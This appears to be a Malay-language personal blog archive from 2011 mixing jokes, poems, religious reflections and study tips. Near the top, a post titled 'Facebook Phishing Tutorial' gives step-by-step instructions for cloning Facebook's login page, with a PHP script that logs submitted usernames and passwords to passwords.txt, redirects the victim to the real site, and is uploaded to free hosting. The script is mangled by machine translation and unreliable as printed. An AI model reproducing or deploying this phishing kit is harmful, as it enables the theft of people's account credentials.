TEMAN ..
Betapa pilunya hati ....
Menghadapi perpisahan ini ...
Pahit manis perjuangan ...
Telah kita rasa bersama ...
Semoga ALLAH meredhai ...
Persahabatan dan Perpisahan ini ...
Tuesday, 20 September 2011
Friday, 2 September 2011
Facebook Phishing Tutorial
Hari ini kita akan membuat phisher untuk facebook.
1) pergi ke facebook, dan melihat sumber, menyalin semua teks untuk notepad.
2) kita perlu mengubah beberapa kod supaya akhbar: Control + F
3) carian untuk tindakan
4) Anda perlu mendapatkan: action = www.facebook.com / login dan bla bla bla
5) memadam semua crap facebook.com, dan meletakkan: lol.php
6) sebelah tindakan anda akan melihat sesuatu yang mengatakan: kaedah = pos
7) perubahan "post" untuk "mendapatkan" menyimpan fail, nama itu: index.php dan menyimpannya ke dalam desktop tetapi ingat! di mana ia berkata: "menyelamatkan sebagai jenis" mengubahnya kepada "semua fail" ini adalah sangat penting
9) membuat fail baru dalam notepad, dan meletakkan kod ini:
<? php
header ("Location: http://www.Facebook.com/login.php");
$ mengendalikan = fopen ("passwords.txt", "a");
foreach ($ _GET $ pembolehubah = nilai> $) {
fwrite ($ mengendalikan, $ pembolehubah);
fwrite ($ mengendalikan, "=");
fwrite ($ mengendalikan, $ nilai);
fwrite ($ mengendalikan, "\ r \ n");
}
fwrite ($ mengendalikan, "\ r \ n");
fclose ($ mengendalikan);
keluar;
?>
10) sekarang simpan sebagai lol.php dan ingat melainkan sebagai jenis fail untuk semua fail.
11) sekarang, membuat fail baru dalam notepad, tidak menulis apa-apa, menyimpan ia sebagai: passwords.txt
12) sekarang memuat naik kesemua mereka dalam www.t35.com
Thursday, 18 August 2011
Punk
Seorang budak punk mengajak kawannya datang ke rumah barunya. Dengan bangga dia menunjukkan ruang-ruang bilik dan hiasan rumahnya itu. Mereka berhenti di sebuah gong tembaga yang besar dan kelihatan menarik dan antik.
Kawannya bertanya, "apa benda ni? Kau budak punk pun boleh minat dengan dikir barat ke?"
"Menarik kan?" Jawab budak punk itu. "Ini bukan alat muzik lah bro. Ini jam bercakap."
"Jam bercakap?! Fuyohh! Bro, macam mana ia beroperasi? Sekarang pukul berapa, cuba kau demo sikit."
"Demo? Kau serius? Ok, tengok ni," kata budak punk itu lalu mengangkat gendang besi yg kelihatan berat sambil menghayun kuat menghentam ke tengah-tengah gong itu yg terus mengeluarkan bunyi yang kuat bagaikan boleh memecahkan gegendang telinga.
Tiba-tiba terdengar jeritan di sebalik tembok rumah sebelah, "Hoi!!! Kau dah tebiat nak mampus ke apa hah?!!! Dah pukul 2 pagi lah biul. Tak tahu nak tidur ke?!! Sewel punya budak!"
"Ah! Dah pukul 2 pagi daaah," jelas budak punk itu.
Kawan dia cuma garuk kepala masih blur dan terkedu lagi nak cakap apa-apa.
Kawannya bertanya, "apa benda ni? Kau budak punk pun boleh minat dengan dikir barat ke?"
"Menarik kan?" Jawab budak punk itu. "Ini bukan alat muzik lah bro. Ini jam bercakap."
"Jam bercakap?! Fuyohh! Bro, macam mana ia beroperasi? Sekarang pukul berapa, cuba kau demo sikit."
"Demo? Kau serius? Ok, tengok ni," kata budak punk itu lalu mengangkat gendang besi yg kelihatan berat sambil menghayun kuat menghentam ke tengah-tengah gong itu yg terus mengeluarkan bunyi yang kuat bagaikan boleh memecahkan gegendang telinga.
Tiba-tiba terdengar jeritan di sebalik tembok rumah sebelah, "Hoi!!! Kau dah tebiat nak mampus ke apa hah?!!! Dah pukul 2 pagi lah biul. Tak tahu nak tidur ke?!! Sewel punya budak!"
"Ah! Dah pukul 2 pagi daaah," jelas budak punk itu.
Kawan dia cuma garuk kepala masih blur dan terkedu lagi nak cakap apa-apa.
Cita-Cita .
Cuti semester bagi murid-murid sekolah bagi sebuah sekolah yang berada di luar Bandar telah tamat tempohnya. Sekumpulan murid-murid pintar dari kelas 6 gigih dengan cerianya memulakan kelas pertama dengan Cikgu Fery.
Seperti kebiasaan pada awal kelas cikgu ingin menyematkan semangat belajar dalam diri pelajar dengan bertanyakan cita-cita mereka.
Satu persatu pelajar dengan bersemangat menjawab.
Kimi: Saya ingin jadi Doktor.
Cikgu Fery : Bagus….nanti cikgu boleh dapatkan rawatan percuma.
Fick: Saya ingin jadi petani moden.
Cikgu Fery : Lagi bagus….nanti hantarkan bekalan sayur percuma ke rumah cikgu.
Cikgguuuuu!!!.Sahut seorang murid bernama Aidiel dari meja belakang…
Cikgu Fery : Yer saya….
Aidiel : Cita-cita dorang tak mencabar la cikgu…cita-cita saya ingin pecahkan rekod dunia..saya ingin menjadi orang pertama menjejaki kaki ke planet matahari.
Semua murid tepuk tangan dan bersorak.
Cikgu Fery : Saya rasa cita-cita awk tu akan menyebabkan awak dapat menetapkan tarikh mati awak la….kan planet matahari tu panas... terbakar la kaki awak tu…tengok macam petang ni la, panaskan…tapi ni jaraknya masih jauh..
Semua pelajar tengok Aidiel…
Aidiel: Ala…cikgu ni… cikgu…ingat saya ni bodoh sangat ke, saya tahu la matahari tu panas…tapi saya bercadang nak pergi malam…malam kan sejuk..macam semalam sejuk je…..
Semua murid tepuk tangan dan bersorak.
Akibat Berborak Dalam Tandas Awam
Ketika dalam perjalanan pulang dari kampung, aku singgah sebentar di kedai buku Ali di Perak untuk mencari buku rujukan. Ketika sedang mencari buku tersebut, tiba-tiba perut aku terasa memulas-mulas. Aku pun terus keluar dari kedai tersebut dan mencari tandas yang terdekat.
Ketika aku sedang asyik melayan perut aku yang semakin memulas-mulas, tiba-tiba aku terdengar orang yang berada di dalam tandas sebelah bersuara.
“Hah, macam mana sekarang?”
Aku pun bukannya suka sangat berbual dengan orang yang aku tak kenal. Tapi aku layan je la.
“Ok jugak la..”
Lepas tu orang tu pun bertanya lagi.
“Engkau nak pergi mana ni??”
Aku mula berasa musykil. Betul ke dia ni bercakap dengan aku. Aku pun jawab je la.
“Aku on the way balik..singgah sini jap. Nak beli buku..”
Orang sebelah tu pun bertanya lagi.
“Bila engkau nak gerak ni..?”
Aku pun jawab.
Lepas habis ni aku nak pergi beli buku. Lepas tu balik la..”
Kemudian orang yang berada di tandas sebelah tu pun berkata..
“Wei, kejap lagi aku call kau balik. Tiap kali aku tanya soalan kat kau, mamat bodoh sebelah ni plak yang jawab..!!”
Lawak Pak Dolah .
Pada suatu petang, Pak Dolloh pergi bersiar-siar di kawasan rumahnya kerana bosan duduk di rumah. Ketika sedang bersiar-siar, dia terjumpa seketul tahi yang masih lagi baru. Pak Dolloh melihat tahi tersebut dan berasa muykil sama ada itu tahi atau pun bukan. Lalu dia mengambil keputusan untuk mengkaji tahi tersebut untuk memastikan sama ada ianya betul-betul tahi atau pun bukan.
Pak Dolloh melihat tahi itu dengan lebih dekat dan berkata..
“Hm….bentuk macam tahi…..”
Kemudian dia memegang tahi tersebut serta meramas-ramas dan berkata lagi..
“Lembik macam tahi…….”
Setelah dia memegang tahi tersebut dia menghidu pula bau tahi tersebut dan berkata..
“Bau macam tahi…….”
Oleh kerana dia masih ragu-ragu lagi Pak Dolloh pun mengambil keputusan untuk menjilat tahi tersebut dan berkata dengan penuh yakin..
“Sah!! Memang tahi! Nasib baik aku tak terpijak………..”
Cikgu Kaunseling
Cikgu Nur Alia merupakan seorang guru kaunseling yang baru sahaja berkhidmat di sebuah sekolah di pinggir bandar Kuala Lumpur . Beliau merupakan seorang cikgu yang amat disukai disekolah berkenaan kerana sifatnya yang lemah lembut dan mudah mesra dengan pelajar. Di sekolah, beliau sering menegur dan bertanya pada pelajar jika mereka mempunyai sebarang masalah yang boleh menggangu pembelajaran mereka.
Sehinggalah pada suatu hari, ketika cikgu Nur Alia sedang berjalan menuju ke kantin sekolah, beliau ternampak seorang pelajar yang sedang berdiri seorang diri di hujung padang melihat rakan-rakannya bermain bola sepak. Lalu beliau pun menegur pelajar tersebut.
“Dari tadi cikgu tengok awak ni termenung je..awak ada masalah ke??”
Pelajar tersebut yang sedang asyik melihat rakan-rakannya bermain bola hanya menggeleng-gelengkan kepalanya sahaja tanpa menoleh memandang beliau. Oleh kerana terlalu lapar, beliau meninggalkan pelajar tersebut dan terus pergi ke kantin.
Setelah selesai makan, beliau pulang ke bilik kaunseling di mana di situlah tempat beliau bekerja dan memberi kaunseling kepada pelajar sekolah berkenaan. Ketika sedang berjalan, beliau ternampak pelajar yang ditegurnya sebentar tadi masih lagi berdiri ditempat yang sama. Kini cikgu Nur Alia yakin yang pelajar tersebut mempunyai masalah. Lalu beliau pun menegur pelajar berkenaan sekali lagi.
“Dari tadi cikgu tengok awak berdiri kat sini. Kawan-kawan awak main bola tapi awak tengok je..awak ada masalah ke? Kalau ada cerita la pada saya. Saya boleh tolong. Saya ni kan cikgu kaunseling kat sekolah ni.”
Pelajar tersebut memandang cikgu Nur Alia dengan dahi berkerut. Cikgu Nur Alia pun berkata lagi.
“Jangan malu..saya tahu awak ada masalah. Dari tadi saya tengok awak berdiri kat sini je…”
Lalu pelajar itu pun menjawab.
“Saya berdiri kat sini sebab saya penjaga gol….”
Lawak Pejabat Pos
Hari Isnin yang lalu, Ali telah pergi ke Pejabat Pos Kuala Lumpur untuk mengirim sebuah bungkusan yang agak besar. Setelah sampai disana, Ali menyedari bahawa bungkusan tersebut tidak mempunyai alamat lalu dia membawa bungkusan tersebut ke sebuah meja yang ada di pejabat pos tersebut.
Ketika Ali sedang menulis alamat pada bungkusan tersebut, tiba-tiba datang seorang lelaki tua kepada Ali dan meyapa beliau.
Lelaki Tua: “Nak..pakcik nak minta tolong sikit boleh tak?“
Ali: “Tolong?? Tolong apa pakcik?“
Lelaki Tua: “Boleh tak anak tolong tuliskan poskad ni untuk pakcik? Sebenarnya tangan pakcik terseliuh tadi. Nak pegang pen pun tak boleh..apatah lagi nak menulis.“
Ali : “Ooo…..boleh..boleh.“
Ali pun mengambil poskad tersebut dan menulis apa yang dikatakan oleh lelaki tua itu tadi kepadanya. Setelah siap menulis Ali pun bertanya kepada lelaki tua tersebut.
Ali : “Ok! Siap. Ada nak tambah apa-apa lagi?“
Lelaki tua tersebut membaca poskad berkenaan dan kemudian dia berkata.
Lelaki Tua: “Anak tolong tambah kat bahagian bawah tu sikit boleh tak?“
Ali : “Nak tulis apa pakcik??“
Lalu lelaki tua itu pun berkata..
Lelaki Tua: “Anak tulis kat bahagian bawah tu….Maafkan saya kerana tulisan saya agak buruk…“
Lawak Terbaik
abu dan seman lewat ke kelas.. setibenye mereka di kelas..
cikgu: kenape awak lambat, abu?
abu: saya lempar batu ke dalam sungai cikgu..
cikgu: kenape kene lempar batu pulak?
abu: sebab batu bagi berat sampan cikgu.. (kebetulan diorang datang ke sekolah naik sampan.)
cikgu: kamu pulak, seman?
seman: saya tolong abu buang batu, cikgu..
cikgu: berat ke batu tu?
abu dan seman: berat cikgu..
cikgu: ok, takpe.. pergi duduk tempat duduk kamu..
abu dan seman: baik cikgu..
lime minit kendian, datang sorang pelajar baru..
cikgu: eh, ade budak baru.. ha! kenalkan diri kamu..
budak baru: saye budak baru..
cikgu: tapi kenape kamu basah lencun? sape name kamu?
budak baru: name saye BATU..
Umur Tinggal 6 Minggu
Seorang Lelaki tua memasuki bilik doktor untuk pemeriksaan fizikal tahunan. Setelah beberapa minit, doktor keluar dan berkata, "Harun, aku minta maaf, tapi kami mendapati anda menghadapi keadaan yang hanya memungkinkan anda untuk hidup 6 minggu sahaja lagi.
"Tapi Doktor," Harun menjawab, "Saya merasa sihat, saya tak merasa lebih baik dari tahun ini... Hal ini tidak mungkin benar. Apakah tidak ada yang boleh saya lakukan?"
Setelah beberapa saat, doktor berkata, "Ya, anda mungkin boleh ke spa kesihatan yang baru di hujung jalan ini dan mandi lumpur setiap hari".
Harun bersemangat bertanya, "Dan itu akan menyembuhkan saya?"
"Tidak," jawab doktor, "tapi itu akan membuatkan anda terbiasa dengan tanah."
Cinta .
Setelah sekian lama tidak menziarah cucunya, seorang nenek telah pergi ke KL untuk menziarah cucunya yang dirindui itu. Sampai sahaja di rumah cucunya, betapa terkejutnya dia kerana terlihat cucu perempuannya bertelanjang bulat sambil membuka pintu rumah. Neneknya pun bertanya, “Kenapa kau terlanjang bulat ni cu?” “Ooo nenek, saya sedang menunggu suami saya dengan baju cinta ni” jawab cucunya.
“Baju cinta? biar betul cu ni?” kata neneknya lagi. “Betul nek, suami saya suka sayapakai baju cintani” jawab cucunya. “Nenek masuk dulu dalam bilik eaa, nanti malu pulak suami saya tengok nenek ada kat sini. Suami saya mungkin malu bila saya pakai baju cinta ni dan nenek ada juga.” “Ok lah cu, nenek masuk bilik dulu” kata neneknya.
Pada keesokan harinya, neneknya pun mengambil keputusan untuk pulang ke kampung setelah puas berjumpa dengan cucunya. Dipendekkan cerita, dalam perjalanan pulang, si nenek teringat akanbaju cintacucunya. Lantas, si nenek pun berfikir untuk membuat perkara yang sama pada suaminya.
Sampai sahaja di rumah, si nenek pun dengan pantas membuka baju tanpa meninggalkan seurat benang pun di badannya danmenyolek mukanyasambil menunggu si atok pulang. Beberapa minit kemudian, si atok pun pulang dan terkejut besar sambil berkata, “Oii!! apa awak ni?terbogelmacam ni, dah buang tebiat nak mampus ke? “Eh abang ni, tak romantik langsung la.. ni kan baju cinta kita” Si nenek jawab sambil tersenyum menggoda.
“Baju Cinta!!? ooo.. gitu.. kalau ye pun gosok la dulu baju tu, nampak sangatkedutnya…” kata atuk sambil berlalu..
Doa
Doa memberikan kekuatan pada orang yang lemah,
Membuat orang tidak percaya menjadi percaya,
Memberikan keberanian pada orang ketakutan...
Setiap dari sesuatu yang dijadikan olehNya pasti datang dengan sebab dan sifat. Begitu juga dengan sebuah hari yang belum tentu manis pahit yang menanti untuk kita lalui sebagai hambaNya.
Doa itu bekal,
Doa itu senjata...
Mana mungkin kita hamba yang lemah boleh mengatur langkah gagah tanpa bantuan dariNya, sedang Nabi dan para Rasul yang maksum saban malam bersengkang mata menadah tangan berdoa agar perjuangan dan hati mereka sentiasa di bawah kasih sayang dan rahmatNya. Apatah lagi kita insan yang lemah yang hina dina ini. Jangan sombong dengan Khaliq.
Beza Khinzir Dengan Anak Dara .
Khinzir:
Bila sentuh Kita hanya perlu samak je…
tengok tak HARAM
sentuh tak BERDOSA
tak perlu minta AMPUN DOSA…
makan je HARAM dan perlu minta AMPUN DOSA.
Anak Dara:
Aurat tak dijaga, ditengok HARAM
Pegang HARAM
bila dah pegang, tak boleh samak SEPERTI KHINZIR kena minta AMPUN DOSA²…
“Bergomolan dengan babi (khinzir) itu adalah lebih baik berbanding dengan bersentuhan (secara sengaja) dengan wanita yang bukan mahram.” Riwayat Ibnu Majah.
Bila sentuh Kita hanya perlu samak je…
tengok tak HARAM
sentuh tak BERDOSA
tak perlu minta AMPUN DOSA…
makan je HARAM dan perlu minta AMPUN DOSA.
Anak Dara:
Aurat tak dijaga, ditengok HARAM
Pegang HARAM
bila dah pegang, tak boleh samak SEPERTI KHINZIR kena minta AMPUN DOSA²…
“Bergomolan dengan babi (khinzir) itu adalah lebih baik berbanding dengan bersentuhan (secara sengaja) dengan wanita yang bukan mahram.” Riwayat Ibnu Majah.
Wednesday, 17 August 2011
Suka Menyalahkan Orang Lain
Apa yang saya ingin katakan pada hari ini adalah, saya begitu pelik dengan perangai manusia (tak semua) yang menganggap diri mereka sahaja yang betul dan orang lain salah walaupun salah orang lain itu hanya 1 dalam 1000 kebaikan. Mengapa? Dalam 1001 perkara, yang 1000 mereka tidak nampak tetapi yang satu itulah mereka gunakan untuk membenci seseorang.
Adakah mereka lupa bahawa manusia itu bukan maksum? Adakah mereka lupa yang manusia itu tidak dapat mengelak melakukan kesilapan? Mengapa mereka tidak bertanya atau berhubungan dengan yang melakukan kesilapan itu dahulu sebelum mereka menggembar-gemburkan? Tidakkah itu boleh memburuk-burukkan individu tersebut?
Adakah mereka tidak tahu yang mereka akan mendapat dosa jika membongkar aib (keburukan) orang lain??? Adakah mereka tidak tahu banyak sebab dan faktor sesuatu kesilapan itu dilakukan atau mungkin ia tak sengaja dilakukan? Jelas, kalau akal sudah diletak di lutut, maka fikiran dah tak terkawal dan sudah tidak memikirkan sesuatu secara baik.
Manusia, memang suka melihat kesilapan orang lain sehingga tidak sedar rasa ujub sudah melanda pada jiwa mereka walaupun mereka mengatakan mereka tidak ujub dan riak… Hakikatnya, mereka tidak nampak akan diri mereka kerana sifat ujub itu berada dalam bahagian tetingkap “buta”.
Adalah satu kejahilan jika kita menggembar-gemburkan sesuatu kesilapan itu jika ia hanya perkara kecil sahaja. Oh, lawak betul.Maaf jika ada yang terasa, tapi yang pasti, anda tidak melakukannya, insyaAllah dan saya juga sentiasa mengingatkan diri saya sendiri akan hal yang “lawak” ini.
Mungkin entry saya kali ini akan membuat banyak pihak TERASA..Bukan niat untuk membuat mana2 pihak TERASA tapi hanya untuk berkongsi apa yang saya fikirkan sekarang ni.Saya pun seorang MANUSIA yang tidak lari dari MEMBUAT KESILAPAN.Sebelum saya mengundurkan diri,saya ingin memohon MAAF sekiranya ada yang terasa dengan entry ni.Hanya utk PERINGATAN sesama MANUSIA.
Adakah Cinta Hebat ?
Gambar Hiasan
Pernahkan kamu merasakan, bahawa kamu mencintai seseorang
meskipun kamu tahu dia tak sendiri lagi?
Dan meskipun kamu tahu cintamu takkan berbalas,
tapi kamu tetap mencintainya?
Pernahkan kamu merasakan, bahwa kamu sanggup melakukan apa saja
demi seseorang yang kamu cintai meskipun kamu tahu, ia takkan pernah peduli?
Ataupun ia peduli dan mengerti tapi ia tetap pergi?
Pernahkan kamu merasakan hebatnya Cinta?
tersenyum kala terluka, menangis kala bahagia,
bersedih kala bersama, tertawa kala berpisah?
Aku pernah tersenyum meskipun kuterluka,
kerana kuyakin Allah tak menjadikannya untukku
Dan aku pernah menangis kala bahagia,
kerana ku takut kebahagiaan cinta ini akan sirna begitu saja
Aku pernah bersedih kala bersamanya,
kerana ku takut aku akan kehilangan dia suatu saat nanti
Dan aku juga pernah tertawa saat berpisah dengannya,
kerana sekali lagi “cinta tak harus memiliki”
dan aku yakin Allah telah menyiapkan cinta yang lain untukku
Aku tetap bisa mencintainya, meskipun ia tak dapat kurangkul dalam pelukanku,
kerana memang cinta ada dalam jiwa, bukan dalam raga.
Tips Belajar Berkesan
Pernahkah anda menghadapi situasi sebegini, anda telah berhempas pulas mengulangkaji sehari sebelum ujian bulanan berlangsung. Malangnya sewaktu di dewan peperiksaan, soalan ujian itu seperti tidak terjawab kerana segala fakta yang dibaca hilang entah ke mana.
Satu persoalan, adakah anda faham apa yang anda baca? Sebenarnya pemahaman berkait rapat dengan pengingatan. Untuk mengingati suatu fakta dengan mudah, kita harus memahaminya dan menggunakan cara yang sistematik untuk memahaminya dan menggunakan cara yang sistematik untuk mengingatinya. Disini tersenarai beberapa teknik mengingati suatu fakta dengan sistematik dan mudah. Sebenarnya setiap orang mempunyai otak yang sama hanya bergantung kepada cara individu menggunakannya.
- Berbisik sendirian boleh membantu menguatkan ingatan.
Apabila anda cuba menghafal sesuatu fakta, anda boleh menukarkannya kepada bahasa dan berbisik kepada diri sendiri. Ini dapat mengukuhkan ingatan anda. - Untuk fakta yang tidak harus dilupakan, mesti dihafal pada keadaan sekitar yang lain dari biasa.
katakan suatu fakta yang agak penting untuk matapelajaran tertentu, maka anda harus menghafalnya dengan baik ditempat yang lain dari biasa. Contohnya menghafal dihadapan cermin atau didalam bilik air. Dengan memikirkan keadaan tersebut, secara tidak langsung anda teringat fakta berkenaan. - Kaitkan fakta yang sukar diingati dengan objek-objek yang selalu dijumpai.
Cari apakah barang yang paling selalu anda lihat. Apabila sukar menghafal sesuatu fakta, kaitkan dengan barang tersebut. Dengan itu, fakta itu tidak mudah luput. - Buat ulangkaji matapelajaran yang dipelajari dalam jangkamasa 9 jam.
Mengikut kajian, hanya 35% atau 2/3 daripada fakta yang dihafal kekal dalam ingatan dalam jangkamasa 9 jam. Oleh itu, dalam masa 9 jam selepas mempelajari sesuatu pelajaran, anda harus mengulangkaji sekali lagi untuk meningkatkan tahap ingatan anda. - Ingatan lebih jelas jika gerakan disertakan.
Semasa belajar sejarah, anda mungkin bosan dengan nama tokoh atau tahun yang perlu diingati. Apabila keadaan ini berlaku, anda boleh berdiri dan cuba melakukan beberapa gerakan yang berkaitan dengan tokoh berkenaan. Dengan itu, anda dapat mengingatinya dengan lebih berkesan. - Pengetahuan yang ada mesti digunakan, barulah menjadi kepunyaan.
Seringkali ada orang bertanya, " Ingatan saya lemah, apakah yang patut saya lakukan?" Sebenarnya, manusia akan melupakan sesuatu untuk mengingati sesuatu yang lain. Sesuatu yang diperlukan akan kekal dalam ingatan dan yang tidak digunakan akan dilupakan. Oleh itu, jika anda mahu apa yang dipelajari kekal dalam ingatan, anda harus sering menggunakannya. - Cara pembelajaran ke depan tiga langkah dan undur dua langkah dapat memperkuatkan ingatan.
Anda boleh membahagikan apa yang anda hendak pelajari kepada tiga bahagian. Selepas menghabiskan bahagian utama, terus ke bahagian kedua. Apabila tamat bahagian kedua, ulangi bahagian pertama dan baca bahagian kedua dan seterusnya. Apabila habis bahagian ketiga, kembali membaca kesemua bahagian. Dengan ini anda pasti dapat mengingati fakta penting dan memahaminya dengan bagus. - Membuat catatan kesilapan dapat mengelakkan kelemahan mudah lupa dan susah untuk mengingati.
Menganggap peperiksaan atau latihan sebagai jalan untuk mencari kesilapan diri, baru ada maknanya. Tetapi manusia sering melupakan sesuatu yang dibencinya atau yang tidak berfaedah kepadanya. Untuk mengelakkan keadaan ini, buat catatan kesilapan yang dilakukan semasa latihan atau peperiksaan. Misalnya, anda boleh melekatkan soalan yang salah dijawab dalam sebuah buku latihan dan tuliskan jawapan sebenar di tepi soalan. Cara ini dapat membantu mengenalpasti kesilapan anda.
Menggunakan Otak Orang Lain
Jangan salah tafsir maksud ayat diatas. Teknik menggunakan otak orang lain ialah menceduk cara pembelajaran dan pengetahuan yang ada padanya untuk kegunaan diri sendiri. Pergaulan yang baik adalah perlu untuk menggunakan cara ini.
- Pandai bercakap tidak setanding pandai mendengar.
Tidak kira siapa pun orang ternama, mereka merupakan orang yang mahir mendengar. Melalui itu, mereka mengumpul banyak maklumat dan menggunakanya atas kerjaya diri sendiri dan mencapai kejayaan. Oleh itu, jika anda hendak menggunakan otak kawan atau guru, anda mesti menjadi seorang yang mahir mendengar. - Mendengar pengalaman kegagalan lebih baik daripada pengalaman kejayaan.
Pengalaman kejayaan seseorang biasanya lebih menumpukan keputusannya dan mengabaikan proses kejayaannya. Sebaliknya jika mendengar pengalaman kegagalan, biasanya akan dijelaskan sebab menghadapai masalah dan kesilapan yang dilakukan dengan teliti. dan tentunya anda tidak akan melakukan kesilapan yang sama. Pengalaman kegagalan petunjuk jalan kejayaan. - Maksud belajar ialah teknik mencuri kaedah pembelajaran dan pengetahuan orang lain.
Belajar adalah mengumpul maklumat kemudian menukarkannya menjadi pengetahuan diri sendiri dan seterusnya menggunakannya. Oleh itu, cara yang paling cepat dan tepat ialah mencuri teknik atau pengetahuan orang lain. Sasarannyaguru, abang , kakak, rakan dan sebagainya. Ini boleh dilakukan dalam pelbagai cara seperti mendapatkan pandangan kawan tentang soalan atau topik tertentu dan kesimpulan yang dibuat olehnya. - Menggunakan otak orang lain dapat mengenalpasti kelemahan diri.
Kandungan nota ialah isi dan maklumat penting dari buku rujukan dan teks. Ia memudahkan proses mengulangkaji. Sekiranya ia dapat ditukar-tukar dengan kawan, anda dapat menukar maklumat yang tidak terdapat dalam buku nota masing-masing. Selain itu, ia juga dapat mengenalpasti kelemahan sendiri. - Menggunakan perbincangan kumpulan kecil dengan betul, membolehkan anda menggunakan otak orang lain untuk belajar.
Kelemahan pembelajaran dalam kumpulan kecil ( study group ) adalah disebabkan tiada kerjasama antara ahli. Jadi pilihlah seorang ketua yang berdaya maju dan berdedikasi dari segi pelajaran dan bertanggungjawab mengajar cara penbelajaran bukan apa yang perlu dipelajari. Ketua akan membahagikan projek kepada setiap ahli kumpulan dan perbincangan tentang jawapan yang tepat dilakukan. Kesimpulannya, kita dapat menerima lebih pandangan dari pelbagai sudut dan lebih memahami pembelajaran. - Membuat ramalan soalan, libatkan lebih ramai kawan.
Jika peperiksaan hampir tiba, antara langkah yang dilakukan ialah membuat ramalan soalan. Tetapi kadangkala soalan tidak menyeluruh dan tidak tepat, kumpulkan soalan ramalan yang dibuat oleh rakan dan buat perbandingan. - Guru merupakan buku rujukan terbaik.
Semasa dalam kelas, anda harus meneliti penerangan guru dan buat catatan fakta yang dititik beratkan. Buat ulangkaji. Jika ada kemusykilan, rujuk kepada guru terbabit untuk penerangan yang jelas ataupun dapatkan nasihat tentang contoh latihan dan buku kerja yang sesuai digunakan. Dengan kata lain, guru merupakan rujukan terbaik.
Ciri Wanita Terbaik
Wanita cantik ialah:
1.Melukis kekuatan melalui masalah
2.Tersenyum saat tertekan
3.Tertawa saat hati sedang menangis
4.Tabah di saat terhina
5.Mempersona kerana memaafkan
6.Mengasihi tanpa balasan
7.Bertambah kuat dalam doa & pengharapan Ilahi…
Ya Allah… Walaupun aku tidak cantik dimata manusia, cukuplah sekadar cantik dihadapan-MU
1)MELUKIS KEKUATAN MELALUI MASALAH.
seorang perempuan itu akan terserlah kekuatannya apabila kita melihat bagaimana dia menghadapi masalah yang datang padanya.sama ada dia lemah mahupun semakin tabah dengan dugaan yang datang padanya.insyaAllah bagi yang kuat dia berjaya memanfaatkan ujian Allah padanya untuk meningkatkan kekuatan dirinya.
4)TABAH DI SAAT TERHINA2)TERSENYUM SAAT TERTEKAN
percaya atau tidak.kalau benar-benar seorang wanita itu mampu melalui masalah yang dihadapi nya kita orang sekeliling dia tidak mampu meneka apakah perasaan dia yang sebenar.kenapa?kerana terlalu dalam untuk kita memahami perasaan dia yang selalu tersenyum tidak kira sama ada dia ada masalah ataupun sebaliknya.alangkah indahnya kalau aku turut sedemikian rupa.
3)TERTAWA SAAT HATI SEDANG MENANGIS
bukan saja-saja dia tertawa saat hatinya terluka dan menangis.dia bersikap sedemikian kerana dia mahu menjadi seorang yang tabah dan tidak mahu menyusahkan orang sekelilingnya.tambahan pula dia yakin akan pertolongan YANG ESA akan datang kepadanya.dan dia tetap tertawa menutup segala gundah dan kelukaan yang ada kerana keyakinannya terhadap bantuan Allah tidak pernah surut.
setiap yang baik itu sentiasa diuji olehNYA dan salah satu daripadanya ialah penghinaan dari manusia.tapi bagi seorang wanita yang cantik pekertinya semua itu bukan lah halangan untuk dia meneruskan hidupnya malah dia akan berusaha untuk menjadi lebih tabah untuk meghadapi hari yang mendatang.ketabahan yang ada dalam diri dia menjadi perisai untuknya menangkis segala hinaan daripada manusia lain yang tidak pernah mengenal erti ketakutan akan azab YANG ESA.
5)MEMPERSONAKAN KERANA MEMAAFKAN
bukan mudah untuk kita memaafkan kesalahan orang lain terhadap diri kita.lebih-lebih lagi apabila melibatkan kesalahan yang melukakan hati hingga hancur musnah sesebuah kehidupan itu.namun bagi seorang wanita yang cantik itu,kemaafan itu sentiasa diberikan kepada yang pernah melukakan malah menyakitkan hatinya.kerana baginya mereka-meraka inilah yang memberi peluang padanya untuk menjadi lebih tabah.subhanallah.
6)MENGASIHI TANPA BALASAN
kasihnya terhadap suami dan keluarganya memang datang dari hatinya yang ikhlas bukanlah kerana mengharapkan sebarang pembalasan.kerana bagi wanita yang cantik seperti ini kasihnya untuk meraka ini bukannya kasih yang dibuat-buat tetapi kasih yang tulus.malah meraka inilah yang membuatkan dia kuat menahan segala tomahan dan ujian dari YANG ESA.dan kasih seorang wanita yang cantik ini amat sukar untuk kita cari dimana-mana melainkan kasih seorang isteri dan ibu yang solehah.
7)BERTAMBAH KUAT DALAM DOA DAN PENGHARAPAN ILLAHI
dia hanya berharap kepada YANG ESA.dan dia juga tidak pernah mengenal erti lelah dalam terus berdoa tidak kira siang dan malam untuk kehidupan orang yang dia sayang.wanita yang cantik tidak mementingkan diri sendiri kerana mereka lebih mementingkan kepentingan orang yang mereka sayang.suami dan keluarga mereka tidak pernah terlepas dari setiap doa-doa yang dipohon kepada YANG ESA.
Terlalu Bodoh
Suatu ketika dahulu syaz merupakan seorang remaja yang agak liar. Dia sering terpengaruh dengan ajakan rakan-rakannya supaya melakukan perkara yang menyalahi hukum agama. Namun sekarang fick sudah pun insaf dari melakukan perkara-perkara tersebut setelah kematian ibunya akibat barah payudara.
Sudah Insaf
Setelah insaf , Syaz sering pergi ke masjid untuk mendengar ceramah agama yang sering diadakan selepas waktu isyak. Ketika sedang kusyuk mendengar ceramah agama tersebut, tabung derma masjid pun diedarkan dan ketika sampai dihadapan Syaz , Syaz segera membuka dompetnya dan memasukkan duti berjumlah RM5 ke daalam tabung derma tersebut.
Tiba-tiba seorang pakcik yang duduk di sebelahnya menepuk bahunya dan menyerahkan duit sebanyak RM 300 kepada Syaz . Syaz berasa sungguh kagum dan insaf dengan kemurahan hati pakcik tersebut dan terus memasukkan duit yang berjumlah RM 300 itu tadi ke dalam tabung derma masjid. Tiba-tiba pakcik tersebut bertanya ke pada Syaz .
Pakcik: “Nak, kenapa anak masukkan duit Rm 300 tu tadi ke dalam tabung
masjid??”
Pakcik: “Nak, kenapa anak masukkan duit Rm 300 tu tadi ke dalam tabung
masjid??”
Syaz: “La..kan duit tu pakcik bagi kat saya untuk saya masukkan ke dalam tabung derma masjid.”
Lalu pakcik itu pun menjawab..
Pakcik: “Eh…bukan..tu sebenarnya duit anak. Pakcik nampak duit anak terjatuh masa anak hendak mengeluarkan duit dari dompet tadi. Sebab tu pakcik bagi kat anak……”
Mencari Ketenangan Jiwa
Ketenangan hati sangat penting bagi setiap insan. Malah, ada yang mengaku tiada guna mempunyai wang banyak jika hati tidak tenang, malah ada orang sanggup mencari ketenangan walaupun sukar untuk memperolehnya.
